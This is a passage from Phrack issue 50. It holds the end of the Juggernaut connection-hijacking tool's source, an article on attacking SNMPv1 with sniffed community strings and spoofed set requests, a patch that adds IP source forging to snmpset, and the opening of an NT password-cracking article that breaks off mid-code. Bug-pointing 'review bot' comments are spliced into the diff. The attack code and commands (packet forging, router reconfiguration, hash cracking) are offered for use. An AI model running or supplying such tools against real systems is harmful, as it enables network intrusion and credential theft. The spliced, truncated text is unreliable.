rippack.ip.version=4; /* IPv4 */
rippack.ip.ihl=5; /* This will change
if options are
present */
switch(transport){
case NOTRANSPORT: /* IP packet only */
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_IP;
break;
case TCPTRANSPORT: /* TCP */
sin.sin_port=tpack.tcp.source;
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_TCP;
tempBuf=(char *)malloc(PHDR+TCPHDR+BUFSIZE);
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=rippack.ip.saddr;
ppheader->daddr=rippack.ip.daddr;
ppheader->prot=IPPROTO_TCP;
ppheader->null=0;
ppheader->tlen=htons(TCPHDR+BUFSIZE);
tpack.tcp.check=0; /* checksum field must be zero while it is computed */
bcopy(&tpack,tempBuf+PHDR,TCPHDR+BUFSIZE); /* header+payload only; the PHDR bytes are already in place */
tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+BUFSIZE);
free(tempBuf);
bcopy((char *)&tpack,(char *)&rippack.payload,TCPHDR+BUFSIZE);
break;
case UDPTRANSPORT: /* UDP */
sin.sin_port=upack.udp.source;
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_UDP;
tempBuf=(char *)malloc(PHDR+UDPHDR+BUFSIZE);
ppheader=(struct psuedoHeader *)tempBuf;
ppheader->saddr=rippack.ip.saddr;
ppheader->daddr=rippack.ip.daddr;
ppheader->prot=IPPROTO_UDP;
ppheader->null=0;
ppheader->tlen=htons(UDPHDR+BUFSIZE);
upack.udp.check=0; /* checksum field must be zero while it is computed */
bcopy(&upack,tempBuf+PHDR,UDPHDR+BUFSIZE); /* header+payload only; the PHDR bytes are already in place */
upack.udp.check=in_cksum((unsigned short *)tempBuf,PHDR+UDPHDR+BUFSIZE);
free(tempBuf);
bcopy((char *)&upack,(char *)&rippack.payload,UDPHDR+BUFSIZE);
break;
case ICMPTRANSPORT: /* ICMP */
sin.sin_addr.s_addr=rippack.ip.daddr;
rippack.ip.protocol=IPPROTO_ICMP;
break;
default: /* Control should never fall here */
if(verbosity)perror("RIP Assembler [unknown transport]");
exit(1);
}
for(k=number,i=0;i
<++> Juggernaut/NumberOneCrush/surplus.c
/*
*
* Juggernaut
* Version b2
*
* 1996/7 Guild productions
* daemon9[guild|phrack|r00t]
*
* comments to route@infonexus.com
*
* This coding project made possible by a grant from the Guild corporation
*
* surplus.c - helper functions
*
*/
/* headers for the stdio, string, signal, tty and socket calls used below */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#define HELPFILE "./ClothLikeGauze/.help"
#define FBUFSIZE 80
#define MINIBUF 10
extern int verbosity;
/*
* IP address into network byte order
*/
unsigned long nameResolve(hostname)
char *hostname;
{
struct in_addr addr;
struct hostent *hostEnt;
if((addr.s_addr=inet_addr(hostname))==-1){
if(!(hostEnt=gethostbyname(hostname)))return(0);
bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
}
return addr.s_addr;
}
#ifdef FASTCHECK
/*
* Fast IP checksum routine.
*/
unsigned short in_cksum(buff,len)
unsigned char *buff;
int len;
{
unsigned long sum = 0;
unsigned long cnt; /* dword loop counter handed to ecx */
if (len>3){
__asm__("clc\n"
"1:\t"
"lodsl\n\t"
"adcl %%eax, %%ebx\n\t"
"loop 1b\n\t"
"adcl $0, %%ebx\n\t"
"movl %%ebx, %%eax\n\t"
"shrl $16, %%eax\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum), "=S" (buff), "=c" (cnt)
: "0" (sum), "1" (buff), "2" (len >> 2)
: "ax", "cc", "memory"); /* operand registers may not also appear as clobbers */
}
if(len&2){
__asm__("lodsw\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum), "=S" (buff)
: "0" (sum), "1" (buff)
: "ax", "cc", "memory");
}
if(len&1){
__asm__("lodsb\n\t"
"movb $0, %%ah\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum), "=S" (buff)
: "0" (sum), "1" (buff)
: "ax", "cc", "memory");
}
sum =~sum;
return(sum&0xffff);
}
#else
/*
* IP Family checksum routine
*/
unsigned short in_cksum(ptr,nbytes)
unsigned short *ptr;
int nbytes;
{
register long sum=0; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
while(nbytes>1){
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1){ /* mop up an odd byte, if necessary */
oddbyte=0; /* make sure top half is zero */
*((u_char *)&oddbyte)=*(u_char *)ptr; /* one byte only */
sum+=oddbyte;
}
sum=(sum>>16)+(sum&0xffff); /* fold the 32-bit sum down to 16 bits */
sum+=(sum>>16); /* add back the carry the fold may produce */
answer=~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
#endif
/*
* Network byte order into IP address
*/
char *hostLookup(in)
unsigned long in;
{
#define BUFSIZE 256
char hostname[BUFSIZE]={0};
struct in_addr addr;
#ifdef USENAME
struct hostent *hostEnt;
#endif
addr.s_addr=in;
#ifdef USENAME
hostEnt=gethostbyaddr((char *)&addr,sizeof(struct in_addr),AF_INET);
if(hostEnt){
strncpy(hostname,hostEnt->h_name,BUFSIZE-1); /* h_name may exceed our buffer */
}
else
#endif
strncpy(hostname,inet_ntoa(addr),BUFSIZE-1);
hostname[BUFSIZE-1]=0;
return(strdup(hostname));
}
/*
* Simple daemonizing procedure.
*/
int shadow(void){
int fd,pid; /* errno comes from <errno.h>; declaring it extern breaks on libcs that define it as a macro */
signal(SIGTTOU,SIG_IGN); /* Ignore these signals */
signal(SIGTTIN,SIG_IGN);
signal(SIGTSTP,SIG_IGN);
switch((pid=fork())){
case 0: /* Child */
break;
default:
exit(0); /* Parent */
case -1:
fprintf(stderr,"Forking Error\n");
exit(1);
}
setpgrp();
if((fd=open("/dev/tty",O_RDWR))>=0){
ioctl(fd,TIOCNOTTY,(char *)NULL);
close(fd);
}
errno=0;
chdir("/");
umask(0);
return(pid);
}
/*
* Keeps processes from zombiing on us...
*/
static void reaper(signo)
int signo;
{
pid_t pid;
int sys;
pid=wait(&sys);
signal(SIGCHLD,reaper);
return;
}
/*
* Dump usage and exit.
*/
void usage(nomenclature)
char *nomenclature;
{
fprintf(stderr,"\n\nUsage:\t%s [-h] [-s TOKEN [-e xx] ] [-v] [-t xx]\n\n"
"-h terse help\n"
"-H expanded help for those 'specially challenged' people...\n"
"-s dedicated sniffing (bloodhound) mode, in which TOKEN is found enticing\n"
"-e enticement factor (defaults to 16)\n"
"-v decrease verbosity (don't do this)\n"
"-V version information\n"
"-t xx network read timeout in seconds (defaults to 10)\n"
"Invoked without arguments, Juggernaut starts in `normal` mode.\n\n",nomenclature);
exit(0);
}
/*
* Simple file pager.
*/
void bookworm(){
FILE *fp;
char tempBuf[FBUFSIZE],buf[MINIBUF];
int i=0;
if(!(fp=fopen(HELPFILE,"r"))){
if(verbosity){
fprintf(stderr,"Cannot open help file.\n");
fprintf(stderr,"[cr]");
getchar();
}
return; /* never page from a NULL stream, verbose or not */
}
while(fgets(tempBuf,FBUFSIZE-1,fp)){
fputs(tempBuf,stderr); /* file contents are data, never a format string */
if(i==24){
fprintf(stderr,"\n[cr,q] >");
bzero(buf,sizeof(buf));
fgets(buf,sizeof(buf),stdin);
if(buf[0]=='q')break;
i=0;
}
else i++;
}
fclose(fp);
}
/*
* Main signal handler to facilitate clean exits.
*/
void twitch(){
void cleanexit();
if(verbosity)fprintf(stderr,"\nCaught signal, exiting cleanly.\n");
signal(SIGINT,SIG_DFL);
signal(SIGQUIT,SIG_DFL);
cleanexit();
}
/*
* Used as a catchall to cleanly exit proccesses
*/
void spasm(){
extern int linksock;
if(linksock)close(linksock); /* Hunter should have this... */
exit(0);
}
/*
* Spy signal handler.
*/
void convulsion(){
void twitch();
extern int sigsentry;
if(verbosity)fprintf(stderr,"\nCaught signal.\n");
fprintf(stderr,"[cr]");
getchar();
signal(SIGINT,twitch);
sigsentry=0;
}
/*
* Pre-hijacking signal handler.
*/
void sputter(){
void twitch();
extern int sigsentry;
if(verbosity)fprintf(stderr,"\nCaught prehijack signal.\n");
signal(SIGINT,twitch);
sigsentry=0;
}
/*
* Post-hijacking signal handler.
*/
void seizure(){
void twitch();
extern int sigsentry;
if(verbosity)fprintf(stderr,"\nCaught posthijack signal.\n");
sigsentry=0;
signal(SIGINT,twitch);
}
/*
* Exit Cleanly.
*/
void cleanexit(){
void powerdown();
extern int ripsock;
extern int hpid;
extern int acrstpid;
close(ripsock);
powerdown();
if(kill(hpid,SIGUSR1))if(verbosity){ /* Send signal to the hunter */
perror("(cleanexit) Could not signal hunter");
fprintf(stderr,"[cr]");
getchar();
}
if(acrstpid) /* Send signal to the automated connection reset daemon.
XXX - This only signals one daemon! If more exist,
they will be left stranded! */
if(kill(acrstpid,SIGUSR1))if(verbosity){
perror("(cleanexit) Could not signal ACRSTD");
fprintf(stderr,"[cr]");
getchar();
}
fprintf(stderr,"Juggernaut is a Guild Corporation production, (c) 1996/7.\n\n");
exit(0);
}
<-->
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
7 of 16
Network Management Protocol Insecurity: SNMPv1
alhambra [guild]
alhambra@infonexus.com
As networks have become larger and more complex, a need has been felt by
certain portions of the network administration crowd to implement network
management protocols. From an administrative point of view, this makes
a lot of sense; centralize the administration of the network, and make it
convenient and easy for the administrator to monitor and administer changes
as needed. As usual, however, from the security point of view, these
protocols are a potential for catastrophe.
In this article, we'll explore the world of SNMPv1. In two later articles
(to be published in later issues of Phrack) we'll look into other network
management schemes (SNMPv2, DCE, etc). SNMPv1 has been around for a while.
In fact, a number of the problems outlined in this paper have been fixed
with the release of SNMPv2. As usual, however, large networks who placed
their original administration burdens on SNMPv1 have been slow to change.
As a result, large corporations, universities, and some small/cheap ISP's
still run their routers/hubs/bridges/hosts/etc with version 1 enabled, often
in horribly set up configurations.
The SNMP protocol
The SNMP protocol has 5 simple types of messages. They are get-request,
get-next-request, set-request, get-response and trap. We will concentrate
on using the get-* messages to retrieve information from remote sites, routers
and the like, and the set-request to manipulate a variety of settings on our
target.
SNMP uses UDP as its transport mechanism. The basic layout of an SNMP packet
is:
+-----------------------------------------------------------------------------+
|IP |UDP|Version|Community|PDU |Request|err.|err. |name|value|name|value| ... |
|Hdr|Hdr| | |Type| ID |stat|index| | | | | |
+-----------------------------------------------------------------------------+
Community is SNMP's authentication mechanism. PDU type is the type of message
being sent (get-request, set request, etc.) Request ID is used to
differentiate between requests. Error status is (obviously) used to transport
error messages, and error index gives the offset of the variable which was in
error. Finally, name and value represent the name of the field requested and
either the value to set it to or the value of it on the remote server. These
are defined by a MIB written in ASN.1, and encoded using a code called BER.
ASN.1 is used to define data and the types and properties of this data.
BER is used to actually transmit the data in a platform independent manner
(similar perhaps to XDR.)
The values that can be fetched and set via SNMP are defined in what is called
the Message Information Base or MIB. The MIB is written in ASN.1, and defines
all the different variable classes, types, variables and whatnot associated
with SNMP. Standard things in the MIB are classes used to define variables
associated with data for statistics and values for the system as a whole, the
interfaces on the system, (possibly) an address translation table, IP, TCP,
UDP, ICMP, and so on, depending on just what kind of system the agent is
running on.
Where exactly do SNMPv1's security flaws lie? We can narrow them down to
4 general problem areas:
1) Use of UDP as a transport mechanism
2) Use of clear text community names and the presence
of default, overprivileged communities
3) Information available
4) Ability to remotely modify parameters.
They're all related to one another. We'll go through one by one, define
the problem, and explain how it is exploitable. Unfortunately, most of
SNMPv1 (from here on out, we'll just call it SNMP) problems stem from its
design, and have no easy solution barring the move to SNMPv2 or some other
network management protocol. Some common sense, however, can minimize the
problems in most situations.
UDP as a transport mechanism
I know I'm not alone in feeling that UDP is, at best, a poor idea when
used in any sort of application that requires any level of security. The
fact that UDP is connectionless leads to a myriad of problems with
regard to host based authentication, which unfortunately enough, SNMP uses
as one of its mechanisms. So we have 2 basic attacks due to the fact that
a UDP transport is used. First, we can easily spoof packets to a server, and
modify/add/reconfigure the state of the server. As we're using a spoofed
source address, there isn't any way to get the return message, but the
machine we are spoofing will simply drop the response message, and the server
is none the wiser. Using our 'snmpset' program which has been modified to
use a raw socket to allow us to forge the source address, we can modify any
value in the MIB defined as read-write ASSUMING WE HAVE A PRIVILEGED COMMUNITY
NAME.
snmpset -v 1 -e 10.0.10.12 router.pitiful.com cisco00\
system.sysName.0 s "owned"
changes the router name to 'owned', just in case we want to be really
obvious that this router has crappy security.
But how do we go about getting a legitimate community name? We have a few
different methods we can employ.
Use of cleartext community names, and default communities
One of the most laughable things about the SNMP protocol is its
"authentication" method. I use the term authentication in the loosest
sense only, as it makes me cringe when I think about it. SNMP only
can authenticate based on two different elements. The source address, as
we saw above, is trivial to forge, rendering address based authentication
useless. The second method is the use of "community" names. Community names
can be thought of as passwords to the SNMP agent. As easily as plaintext
password can be sniffed from telnet, rlogin, ftp and the like, we can sniff
them from SNMP packets. As a matter of fact, it's easier, as every SNMP
packet will have the community name. Grab your favorite sniffer (sniffer, not
password sniffer) and head over to your favorite segment running SNMP. My
sniffer of choice is 'snoop' so I'll use it as my example, though using any
other sniffer should be easy. SNMP uses port 161. The field we're after, the
community, is typically 6-8 characters long. Cranking up snoop on my segment
reveals the following. (IP's changed to protect the stupid, of course)
# snoop -x 49,15 port 161
Using device /dev/le (promiscuous mode)
10.20.48.94 -> 10.20.19.48 UDP D=161 S=1516 LEN=62
0: 0572 3232 3135 a028 0202 009c 0201 0002 .r4485.(.......
There we go. Using this community name we're able to grab all the info
we want, and modify all the parameters and whatnot we desire. Easy enough...
if you're able to sniff the segment. But what happens when you can't?
Available Information
When you can't sniff the segment, life gets a little more complicated. But
only a little. We have a few things on our side that may come in handy.
First off, almost always there is a default 'public' community. Very few
admins take the time to deactivate this community, nor realize the risk it
poses. Using this community, we can usually read all the information we want.
Quite often, being able to read the information gives us enough clues to
try to brute force a legitimate community name.
snmpwalk -v 1 router.pitiful.com public system
will dump the contents of the system table to us, returning something like:
system.sysDescr.0 = "Cisco Internetwork Operating System Software ..IOS (tm) GS
Software (RSP-K-M), Version 11.0(4), RELEASE SOFTWARE (fc1)..Copyright (c) 1986
-1995 by cisco Systems, Inc...Compiled Mon 18-Dec-95 22:54 by alanyu"
system.sysObjectID.0 = OID: enterprises.Cisco.1.45
system.sysUpTime.0 = Timeticks: (203889196) 23 days, 14:21:31
system.sysContact.0 = "Jeff Wright"
system.sysName.0 = "hws"
system.sysLocation.0 = ""
system.sysServices.0 = 6
We see that we're dealing with a cisco router, and we see its contact's name,
and the system name. Same as we might do with guessing passwords, we can use
this information to try to piece together a community name. Popular favorites
include stuff like 'admin' 'router' 'gateway' and the like, combined with
numbers or whatnot. Trying something like 'routerhws' for the above example
might work. It might not. While failed attempts are noted, very few people,
if any, ever check for them. (as it turns out, the above router had a
community name of 'cisco00'. Imaginative, eh?)
Even if only public works, there's lots of interesting things available via
SNMP. We can dump routing tables, connection tables, statistics on router use.
In certain situations, we can even get information on packet filters in place,
and access control rules. All are useful information to have in setting up
attacks in conventional manners. Sometimes public is even given r/w on
certain tables, and we can do most of what we need to do via that account.
When we do have a privileged community though, the fun begins.
Remote Manipulation via SNMP
We have all the elements we need to remotely configure the network. We have
a community name, we have the ability to forge the manager (the SNMP client)
address. All we need to figure out is what we can modify. This really
varies. There are a set of defaults that almost every SNMP'able machine
will have. In addition to these, though, are the 'enterprise' MIB's, which
define vendor specific SNMP tables and fields. There's really too much to go
into here. Check out ftp://ftp.cisco.com/ or ftp://ftp.ascend.com/ , for
example...most vendors make their MIB's easy to find. Cisco's web page also
has a great introduction to their enterprise MIB's, which detail all the
differences between different IOS release levels and whatnot.
In the meantime, though, check out the following as fun places to begin:
system.sysContact \
system.sysName |- really sorta pointless to change, but hey...whatever.
system.sysLocation /
interfaces.ifTable.ifAdminStatus.n (where n is a number, starting at 0)
at.atTable.atIfIndex.n
at.atTable.atPhysAddress.n
at.atTable.atNetAddress.n
ip.ipForwarding
ip.ipDefaultTTL
ip.ipRouteTable.* (there's tons of stuff in this table)
ip.ipNetToMediaTable.* (same as above)
tcp.tcpConnState.* (only setable to 12, which deletes the TCB)
and so on. If you have a copy of TCP/IP Illustrated Vol. 1, the SNMP chapter
will give you a set of tables with the types of all these values. If you don't
have TCP/IP Illustrated, get off your computer and go buy it.
Remember, people don't really like it too much when you muck with their
equipment. Act responsibly.
And to the admins reading this: TURN OFF SNMPv1! Think about it. Any time
you allow control of your network via the network in a manner as unsafe as
how SNMPv1 does it, you're creating more problems for yourself. Realizing
it's all about acceptable risks, realize this isn't one. Go investigate
alternate network management software. Realize, however, there are always
going to be problems. (I don't recommend SNMPv2, however...a few months from
now when I release my SNMPv2 article and tools, you'll be glad you are not
running it)
Resources:
The software I use is based on the UCD modifications to the CMU SNMP
distribution. It is available at:
ftp://ftp.ece.ucdavis.edu/pub/snmp/ucd-snmp-3.1.3.tar.gz
Following this article there is a patch containing the modifications to
the snmplib to support address spoofing, and modifications to the 'snmpset'
app to support them. The patch is only known to work under Solaris, though
it should take only minor changes to move it to any other platform.
ftp.cisco.com/pub/mibs and ftp.ascend.com/pub/Software-Releases/SNMP/MIBS
contain the enterprise MIBS for a variety of different pieces of hardware.
www.cisco.com/univercd/ contains tons of info on a variety of different
Cisco hardware and software, including great references on SNMP under IOS.
http://www.cs.tu-bs.de/ibr/cgi-bin/sbrowser.cgi
has a MIB browser, which allows you to use your favorite web client to
peruse the standard as well as vendor MIBs on their site.
RFC's! Yes! All of them. Go to http://www.internic.net/ds/dspg0intdoc.html
and read them. Do a search for SNMP and you'll get back tons of hits.
They're a little...hrm...terse at times, but these are the de facto definitions
of SNMP. Skimming them will give you more info than you can imagine.
<++> SNMPv1/snmp.diff
*** apps/snmpset.c Mon Jan 20 09:07:22 1997
-- apps/snmpset.c Tue Apr 8 17:21:03 1997
***************
*** 77,83 ****
void
usage(){
! fprintf(stderr, "Usage: snmpset -v 1 [-q] hostname community [objectID typ
e value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type
value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con
text [oID type val]+\n");
fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n");
--- 77,83 ----
void
usage(){
! fprintf(stderr, "Usage: snmpset -v 1 [-e fakeip] [-q] hostname community [
objectID type value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname noAuth [objectID type
value]+ or:\n");
fprintf(stderr, "Usage: snmpset [-v 2] [-q] hostname srcParty dstParty con
text [oID type val]+\n");
fprintf(stderr, "\twhere type is one of: i, s, x, d, n, o, t, a\n");
***************
*** 85,90 ****
--- 85,93 ----
fprintf(stderr, "\t\tn: NULLOBJ, o: OBJID, t: TIMETICKS, a: IPADDRESS\n");
}
+ extern char *fakeaddr;
+ extern int nastyflag;
+
int
main(argc, argv)
int argc;
***************
*** 152,158 ****
usage();
exit(1);
}
! break;
default:
printf("invalid option: -%c\n", argv[arg][1]);
break;
--- 155,165 ----
usage();
exit(1);
}
! break;
! case 'e':
! fakeaddr = argv[++arg];
! nastyflag = 1;
! break;
default:
printf("invalid option: -%c\n", argv[arg][1]);
break;
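Review bot: `fakeaddr = argv[++arg]` in the new `case 'e'` reads past the argument vector when `-e` is the last word on the command line: `argv[argc]` is NULL, and the `inet_addr(fakeaddr)` call added in snmp_api.c then dereferences it. Check `arg + 1 < argc` before consuming the value, and reject an address that `inet_addr()` cannot parse (it returns INADDR_NONE) here at option-parsing time, so the error surfaces in `main()` rather than inside `snmp_send()`.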
*** snmplib/snmp_api.c Mon Jan 20 10:43:20 1997
-- snmplib/snmp_api.c Tue Apr 8 17:21:08 1997
***************
*** 58,63 ****
--- 58,71 ----
#include
#endif
#include
+
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+
#include
#include "asn1.h"
#include "snmp.h"
***************
*** 847,852 ****
--- 855,882 ----
}
return 0;
}
+ /* EVIL STUFF in_cksum for forged ip header */
+ unsigned short in_cksum(addr, len)
+ u_short *addr;
+ int len;
+ {
+ register int nleft = len;
+ register u_short *w = addr;
+ register int sum = 0;
+ u_short answer = 0;
+ while (nleft > 1) {
+ sum += *w++;
+ nleft -= 2;
+ }
+ if (nleft == 1) {
+ *(u_char *)(&answer) = *(u_char *)w ;
+ sum += answer;
+ }
+ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
+ sum += (sum >> 16); /* add carry */
+ answer = ~sum; /* truncate to 16 bits */
+ return(answer);
+ }
/*
* Sends the input pdu on the session after calling snmp_build to create
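Review bot: the added `in_cksum()` is a non-static external symbol inside snmplib, so any application linking the library that already defines a function of that name (the BSD checksum routine is widely copied under exactly this name) will get a duplicate-symbol error. Make it `static`, and replace the "EVIL STUFF" comment with what the routine computes: the RFC 1071 ones-complement sum over `len` bytes, with the odd trailing byte handled via `answer`.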
***************
*** 857,862 ****
--- 887,894 ----
* On any error, 0 is returned.
* The pdu is freed by snmp_send() unless a failure occured.
*/
+ char *fakeaddr = NULL;
+ int nastyflag = 0;
int
snmp_send(session, pdu)
struct snmp_session *session;
***************
*** 1013,1026 ****
xdump(packet, length, "");
printf("\n\n");
}
!
! if (sendto(isp->sd, (char *)packet, length, 0,
! (struct sockaddr *)&pdu->address, sizeof(pdu->address)) < 0){
! perror("sendto");
! snmp_errno = SNMPERR_GENERR;
! return 0;
! }
/* gettimeofday(&tv, (struct timezone *)0); */
tv = Now;
if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG
--- 1045,1099 ----
xdump(packet, length, "");
printf("\n\n");
}
+ if(nastyflag == 1)
+ {
+ struct ip *ip_hdr;
+ struct udphdr *udp_hdr;
+ char *payload;
+ int socky;
+ struct sockaddr_in dest;
+ payload = (char*) malloc
+ (sizeof(struct ip)
+ + (sizeof(struct udphdr)) + length);
+ ip_hdr = (struct ip*) payload;
+ ip_hdr->ip_v=4;
+ ip_hdr->ip_hl=5;
+ ip_hdr->ip_tos=0;
+ ip_hdr->ip_off=0;
+ ip_hdr->ip_id=htons(1+rand()%1000);
+ ip_hdr->ip_ttl=255;
+ ip_hdr->ip_p=IPPROTO_UDP;
+ ip_hdr->ip_len = htons(sizeof(struct ip) + sizeof(struct udphdr) + len
gth);
+ ip_hdr->ip_src.s_addr = inet_addr(fakeaddr);
+ ip_hdr->ip_dst = pdu->address.sin_addr;
+ ip_hdr->ip_sum = in_cksum(&ip_hdr,sizeof(ip_hdr));
+
+ udp_hdr = (struct udphdr *) (payload + sizeof(struct ip));
+ udp_hdr->uh_sport = htons(10000+rand()%20000);
+ udp_hdr->uh_dport = htons(161);
+ udp_hdr->uh_ulen = htons(length + sizeof(struct udphdr));
+ udp_hdr->uh_sum = 0;
+ memcpy(payload + sizeof(struct udphdr)+sizeof(struct ip),packet,length
);
+ dest.sin_family = AF_INET;
+ dest.sin_port = htons(161);
+ dest.sin_addr = pdu->address.sin_addr;
+ socky = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
+ fprintf(stderr,"Payload size:%d sent\n",sendto(socky,payload,28+length
,0,
+ (struct sockaddr *)&dest,sizeof(dest)));
+ exit(0);
! }
! else
! {
! if (sendto(isp->sd, (char *)packet, length, 0,
! (struct sockaddr *)&pdu->address,
! sizeof(pdu->address)) < 0)
! {
! perror("sendto");
! snmp_errno = SNMPERR_GENERR;
! return 0;
! }
! }
/* gettimeofday(&tv, (struct timezone *)0); */
tv = Now;
if (pdu->command == GET_REQ_MSG || pdu->command == GETNEXT_REQ_MSG
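Review bot: `ip_hdr->ip_sum = in_cksum(&ip_hdr,sizeof(ip_hdr))` checksums the pointer variable, not the header: `&ip_hdr` is the address of the local `struct ip *` and `sizeof(ip_hdr)` is the size of a pointer, so the IP header checksum is wrong. It should read `in_cksum((u_short *)ip_hdr, sizeof(struct ip))` with `ip_hdr->ip_sum` zeroed beforehand. Elsewhere in the same hunk: the return value of `socket(AF_INET,SOCK_RAW,IPPROTO_RAW)` is never checked (it fails with EPERM for unprivileged callers and `sendto()` is then attempted on fd -1); no `IP_HDRINCL` is set on the socket, which `IPPROTO_RAW` implies on Linux but other platforms require explicitly; `payload` is never freed; and `exit(0)` from inside a library routine terminates the caller, where the `else` branch returns 0 with `snmp_errno` set. Also, the forged path silently skips the `sendto()` error handling the original code had.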
<--> SNMPv1/snmp.diff
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
8 of 16
Cracking NT Passwords
by Nihil
Recently a breakthrough was made by one of the Samba team members, Jeremy
Allison, that allows an administrator to dump the one-way functions (OWF)
of the passwords for each user from the Security Account Manager (SAM)
database, which is similar to a shadowed password file in *nix terms. The
program Jeremy wrote is called PWDUMP, and the source can be obtained from
the Samba team's FTP server. This is very useful for administrators of
Samba servers, for it allows them to easily replicate the user database
from Windows NT machines on Samba servers. It also helps system
administrators and crackers in another way: dictionary attacks against
users' passwords. There is more, but I will save that for later.
Windows NT stores two hashes of a user's password in general: the LanMan
compatible OWF and the NT compatible OWF. The LanMan OWF is generated by
limiting the user's password to 14 characters (padding with NULLs if it is
shorter), converting all alpha characters to uppercase, breaking the 14
characters (single byte OEM character set) into two 7 byte blocks,
expanding each 7 byte block into an 8 byte DES key with parity, and
encrypting a known string, {0xAA,0xD3,0xB4,0x35,0xB5,0x14,0x4,0xEE}, with
each of the two keys and concatenating the results. The NT OWF is created
by taking up to 128 characters of the user's password, converting it to
unicode (a two byte character set used heavily in NT), and taking the MD4
hash of the string. In practice the NT password is limited to 14
characters by the GUI, though it can be set programmatically to something
greater in length.
The demonstration code presented in this article does dictionary attacks
against the NT OWF in an attempt to recover the NT password, for this is
what one needs to actually logon to the console. It should be noted that
it is much easier to brute force the LanMan password, but it is only used
in network authentication. If you have the skillz, cracking the LanMan
password can take you a long way towards cracking the NT password more
efficiently, but that is left as an exercise for the reader ;>
For those readers wit da network programming skillz, the hashes themselves
are enough to compromise an NT machine from the network. This is so because
the authentication protocol used in Windows NT relies on proof of the OWF
of the password, not the password itself. This is a whole other can of
worms we won't get into here.
The code itself is simple and pretty brain dead. Some Samba source was
used to speed up development time, and I would like to give thanks to the
Samba team for all their effort. Through the use of, and study of, Samba
several interesting security weaknesses in Windows NT have been uncovered.
This was not the intent of the Samba team, and really should be viewed as
what it is - some lame security implementations on Microsoft's part. Hey,
what do you expect from the people that brought you full featured (not in a
good way, mind you) macro languages in productivity applications?
You will need md4.c, md4.h, and byteorder.h from the Samba source
distribution in order to compile the code here. It has been compiled and
tested using Visual C++ 4.2 on Windows NT 4.0, but I see no reason why it
should not compile and run on your favorite *nix platform. To truly be
useful, some code should be added to try permutations of the dictionary
entry and user name, but again, that is up to the reader.
One note: You will want to remove 3 lines from md4.c: the #ifdef SMB_PASSWD
at the top and corresponding #else and #endif at the bottom...
Here ya go:
<++> NTPWC/ntpwc.c
/*
* (C) Nihil 1997. All rights reserved. A Guild Production.
*
* This program is free for commercial and non-commercial use.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted.
*
* THIS SOFTWARE IS PROVIDED BY NIHIL ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
/* Samba is covered by the GNU GENERAL PUBLIC LICENSE Version 2, June 1991 */
/* dictionary based NT password cracker. This is a temporary
* solution until I get some time to do something more
* intelligent. The input to this program is the output of
* Jeremy Allison's PWDUMP.EXE which reads the NT and LANMAN
* OWF passwords out of the NT registry and a crack style
* dictionary file. The output of PWDUMP looks
* a bit like UNIX passwd files with colon delimited fields.
*/
#include
#include